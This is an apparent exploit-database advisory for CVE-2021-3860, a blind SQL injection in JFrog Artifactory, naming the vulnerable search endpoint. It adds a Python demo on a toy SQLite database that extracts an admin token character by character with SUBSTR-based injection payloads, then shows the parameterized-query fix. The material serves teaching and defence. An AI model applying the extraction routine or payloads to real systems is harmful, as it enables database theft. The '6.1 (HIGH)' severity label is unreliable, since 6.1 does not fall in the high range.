Vendor: Artifactory
By: ardr
CVSS: 6.1 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Artifactory
Affected Version From: Prior to 7.25.4
Affected Version To: 7.25.4
Patch Exists: YES
Related CVE: CVE-2021-3860
CPE: a:jfrog:artifactory
Platforms Tested: MySQL
2021
Artifactory Low-Privileged Blind SQL Injection
The exploit allows a low-privileged user to perform a blind SQL injection attack against JFrog Artifactory versions prior to 7.25.4. By sending crafted requests to the '/ui/api/v1/global-search/bundles/received' endpoint, the attacker observes only whether the search succeeds, yet by varying the injected condition can extract sensitive information from the backing database one character at a time. This vulnerability is tracked as CVE-2021-3860.
Mitigation:
Update JFrog Artifactory to version 7.25.4 or later. In application code, the durable fix for this class of bug is to pass user-controlled values to the database as bound parameters of a prepared statement rather than concatenating them into the SQL text; input validation is a useful defence-in-depth layer but on its own does not reliably stop SQL injection.
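The following is an added example, not code from the advisory or from JFrog, that shows the mechanics behind a boolean-based blind SQL injection like the one described above and the parameterized-query fix recommended as mitigation. It uses an in-memory SQLite database as a stand-in for the MySQL backend listed under "Platforms Tested"; the table names, column names, bundle data, and the `search_bundles_*` functions are all constructed for illustration and do not reflect Artifactory's real schema or code.

```python
import sqlite3

# Constructed demo database standing in for the real backend. Schema and rows
# are invented for this example; the "api_token" is the secret the attacker
# has no legitimate way to read through the search feature.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bundles (id INTEGER PRIMARY KEY, name TEXT, owner TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, api_token TEXT)")
    conn.executemany("INSERT INTO bundles (name, owner) VALUES (?, ?)",
                     [("release-1", "alice"), ("release-2", "bob")])
    conn.execute("INSERT INTO users VALUES ('admin', 'TOKEN42')")
    conn.commit()
    return conn


def search_bundles_vulnerable(conn, owner, keyword):
    # The injectable pattern: a request-controlled value concatenated straight
    # into the SQL text. The attacker only sees the list of matching names.
    sql = ("SELECT name FROM bundles WHERE owner = '%s' AND name LIKE '%%%s%%'"
           % (owner, keyword))
    return [row[0] for row in conn.execute(sql)]


def search_bundles_fixed(conn, owner, keyword):
    # The mitigation: the same query with bound parameters. The keyword is a
    # value, never SQL syntax, so a quote or comment marker inside it is inert.
    sql = "SELECT name FROM bundles WHERE owner = ? AND name LIKE ?"
    return [row[0] for row in conn.execute(sql, (owner, "%" + keyword + "%"))]


def blind_extract(search, conn, owner, subquery, max_len=32):
    """Boolean-based blind extraction.

    The only oracle is whether `search` returns any rows. Each request asks
    "is character N of the secret equal to X?" by closing the LIKE string,
    appending that test, and commenting out the rest of the original query.
    Characters outside `charset` (none in this demo) would stop the loop early.
    """
    charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-"
    secret = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            payload = "' AND SUBSTR((%s),%d,1)='%s' -- " % (subquery, pos, ch)
            if search(conn, owner, payload):
                found = ch
                break
        if found is None:       # SUBSTR past the end yields '' -> no match -> done
            break
        secret += found
    return secret


if __name__ == "__main__":
    db = make_db()
    target = "SELECT api_token FROM users WHERE username='admin'"
    print("vulnerable:", blind_extract(search_bundles_vulnerable, db, "alice", target))
    print("fixed:     ", repr(blind_extract(search_bundles_fixed, db, "alice", target)))
```

Against `search_bundles_vulnerable` the loop recovers the admin token without ever seeing it in a response; against `search_bundles_fixed` the same payloads are treated as a literal search string, match nothing, and the extraction returns an empty string. Only the parameter binding differs between the two functions, which is the point of the mitigation above.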